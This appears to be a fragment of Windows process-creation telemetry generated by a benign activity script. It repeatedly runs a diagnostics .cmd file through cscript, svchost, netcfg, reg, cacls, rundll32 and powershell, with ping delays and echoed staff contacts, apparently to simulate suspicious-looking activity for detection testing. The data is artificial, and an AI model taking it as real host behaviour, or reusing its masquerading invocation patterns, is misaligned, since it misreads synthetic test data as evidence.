\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26149 \",\"ping 127.0.0.1 -n 24 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"rundll32 \\\\32641\\\\32360.exe\",\"ping 127.0.0.1 -n 24 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14433 c:\\\\temp\\\\8937\\\\1760.ps1\",\"ping 127.0.0.1 -n 24 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 11 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 20 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 11 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe UserCxt\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\compattelrunner.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" Scan -ScheduleJob -ScanTrigger 55\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 13 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -15216 /12420\",\"ping 127.0.0.1 -n 19 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 5 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -29637\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29637\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30962 /15074\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3232\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25774 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\28790\\\\506.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9748 c:\\\\temp\\\\3830\\\\20559.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 8 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 3 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -11581 \",\"ping 127.0.0.1 -n 2 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 29 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\5728\\\\16265.exe\",\"ping 127.0.0.1 -n 22 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -20225 c:\\\\temp\\\\5291\\\\16396.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -20225 c:\\\\temp\\\\5291\\\\16396.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 22 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9528 /16911\",\"ping 127.0.0.1 -n 22 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -27468\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -23226 \",\"ping 127.0.0.1 -n 22 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"rundll32 \\\\5914\\\\3172.exe\",\"ping 127.0.0.1 -n 22 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15059 c:\\\\temp\\\\32400\\\\30510.ps1\",\"ping 127.0.0.1 -n 22 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 25 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 32 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 2 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 16 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -981 /7488\",\"ping 127.0.0.1 -n 20 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 24 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -3759\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3759\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1796 /27802\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2134\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4277 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\25124\\\\21095.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32665 c:\\\\temp\\\\25833\\\\20704.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 3 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 10 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -417 \",\"ping 127.0.0.1 -n 10 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 13 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 22 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\15930\\\\31294.exe\",\"ping 127.0.0.1 -n 20 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -12578 c:\\\\temp\\\\17955\\\\32530.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -12578 c:\\\\temp\\\\17955\\\\32530.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 20 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18358 /18002\",\"ping 127.0.0.1 -n 20 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6872\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22331 \",\"ping 127.0.0.1 -n 20 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"rundll32 \\\\24611\\\\27906.exe\",\"ping 127.0.0.1 -n 20 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9507 c:\\\\temp\\\\32250\\\\13043.ps1\",\"ping 127.0.0.1 -n 20 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 6 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 11 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 26 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 18 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -19514 /2556\",\"ping 127.0.0.1 -n 21 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 11 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -10650\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10650\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11149 /8068\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2525\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2780\\\" \\\"1640\\\" \\\"1628\\\" \\\"1644\\\" \\\"0\\\" \\\"0\\\" \\\"1648\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21826 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\10012\\\\26584.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4605 c:\\\\temp\\\\20191\\\\30968.ps1\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"3760\\\" \\\"1628\\\" \\\"1608\\\" \\\"1632\\\" \\\"0\\\" \\\"0\\\" \\\"1636\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 30 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 21 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -22022 \",\"ping 127.0.0.1 -n 18 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\26132\\\\13555.exe\",\"ping 127.0.0.1 -n 18 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -4931 c:\\\\temp\\\\30620\\\\15896.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -4931 c:\\\\temp\\\\30620\\\\15896.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 18 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26958 /15519\",\"ping 127.0.0.1 -n 18 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -8210\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21175 \",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"rundll32 \\\\21814\\\\15398.exe\",\"ping 127.0.0.1 -n 18 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3521 c:\\\\temp\\\\18194\\\\26595.ps1\",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"taskhostw.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe RefreshSettings\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource 